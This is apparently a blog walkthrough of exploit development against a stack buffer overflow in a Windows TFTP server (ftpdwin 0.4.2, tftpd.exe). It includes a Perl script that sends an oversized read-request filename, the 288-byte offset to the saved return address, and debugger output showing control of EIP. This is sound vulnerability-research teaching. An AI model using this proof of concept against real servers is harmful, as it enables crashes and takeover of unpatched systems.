
Tags: Security Technology | 03-08 23:34
Debug in ftpdwin 0.4.2
writer: demonalex[at]dark2s[dot]org
I remember having seen some information about an overflow in ftpdwin (version 0.4.2), but my memory of it has faded, so I wanted to work out for myself how to overflow that baby... Let me show my tools: IDA, OllyDbg, WinDbg, and so on.
1) First, open IDA, generate a *.MAP file and export it. Attach OllyDbg to tftpd.exe, import the MAP file into OllyDbg, and press F9 to run.
2) Now we must find the length of filler needed to reach the saved return address. How? Write a Perl fuzz script named fuzzer.pl with this content:
*********************************************************
#!/usr/bin/perl -w
use strict;
use Net::TFTP;
$| = 1;
my $target_ip = shift;
die("usage: $0 target_ip\n") unless defined $target_ip;
##################################
# expcode:
my $buffer  = "\x41" x 500;   # filler: length of the useless buffer
my $expcode = $buffer;
##################################
# the filename of the read request is the field we overflow
my $tftp = Net::TFTP->new($target_ip, BlockSize => 1024);
$tftp->octet;
$tftp->get($expcode);
exit 1;
*********************************************************
500 bytes? Wrong: EIP does not become 0x41414141 ("\x41" x 4). How about 400 bytes? Not 400 either. But look at the contents of the stack:
00F5F174 00000000
00F5F178 00406437 return to tftpd.00406437 from <jmp.&msvcrt.strcpy>
00F5F17C 00F5F19C
00F5F180 41414141
00F5F184 00000080
00F5F188 00240000
00F5F18C 00000001
Press Ctrl+G in OllyDbg to go to 00406437 (the instruction right after the strcpy call) and F2 to set a breakpoint there.
3) Attach WinDbg to tftpd.exe and brute-force the filename length until EIP equals 0x41414141: the length is 288 bytes (including the 4-byte RET).
4) Change expcode in fuzzer.pl:
##################################
# expcode:
my $buffer  = "\x41" x 284;          # 284 bytes of filler
my $ret     = "\x44\x43\x42\x41";    # lands in EIP as 0x41424344 (little-endian)
my $expcode = $buffer . $ret;        # 288 bytes in total
##################################
5) Finally, press Ctrl+F2 in OllyDbg to restart tftpd.exe, run the new fuzzer.pl, and let it stop at our breakpoint (00406437). We see:
00406437 |. 8D85 D8FDFFFF     lea eax, [ebp-228]
0040643D |. 890424            mov [esp], eax
00406440 |. E8 DB650100       call <jmp.&msvcrt.strlen>               ; \strlen
00406445 |. 83F8 03           cmp eax, 3
00406448 |. 76 16             jbe short 00406460
0040644A |. C74424 04 5D6>    mov dword ptr [esp+4], 0042655D
00406452 |. 8D85 D8FDFFFF     lea eax, [ebp-228]
00406458 |. 890424            mov [esp], eax
0040645B |. E8 70650100       call <jmp.&msvcrt.strcat>               ; \strcat
00406460 |> 8D85 E8FEFFFF     lea eax, [ebp-118]
00406466 |. 894424 04         mov [esp+4], eax
0040646A |. 8D85 D8FDFFFF     lea eax, [ebp-228]
00406470 |. 890424            mov [esp], eax
00406473 |. E8 58650100       call <jmp.&msvcrt.strcat>               ; \strcat
00406478 |> 8B45 10           mov eax, [ebp+10]
0040647B |. 05 04010000       add eax, 104
00406480 |. 894424 0C         mov [esp+C], eax
00406484 |. 8B45 10           mov eax, [ebp+10]
00406487 |. 894424 08         mov [esp+8], eax
0040648B |. C74424 04 040>    mov dword ptr [esp+4], 104
00406493 |. 8D85 D8FDFFFF     lea eax, [ebp-228]
00406499 |. 890424            mov [esp], eax
0040649C |. E8 7F6C0100       call <jmp.&KERNEL32.GetFullPathNameA>   ; \GetFullPathNameA
004064A1 |. 83EC 10           sub esp, 10
004064A4 |. 85C0              test eax, eax
004064A6 |. 75 0C             jnz short 004064B4
004064A8 |. C785 D4FDFFFF>    mov dword ptr [ebp-22C], 0
004064B2 |. EB 0A             jmp short 004064BE
004064B4 |> C785 D4FDFFFF>    mov dword ptr [ebp-22C], 1
004064BE |> 8B85 D4FDFFFF     mov eax, [ebp-22C]
004064C4 |. C9                leave
004064C5 \. C3                retn
Step with F8 from 00406437 down to 004064C5. When you arrive at the retn at 004064C5, stop and look at the top of the stack:
00F5F3C8 41424344
00F5F3CC 00428B00 tftpd.00428B00
The dword at the top of the stack is our $ret ("\x44\x43\x42\x41", read as the little-endian value 0x41424344); the retn pops it straight into EIP.
Hey hey, you did it~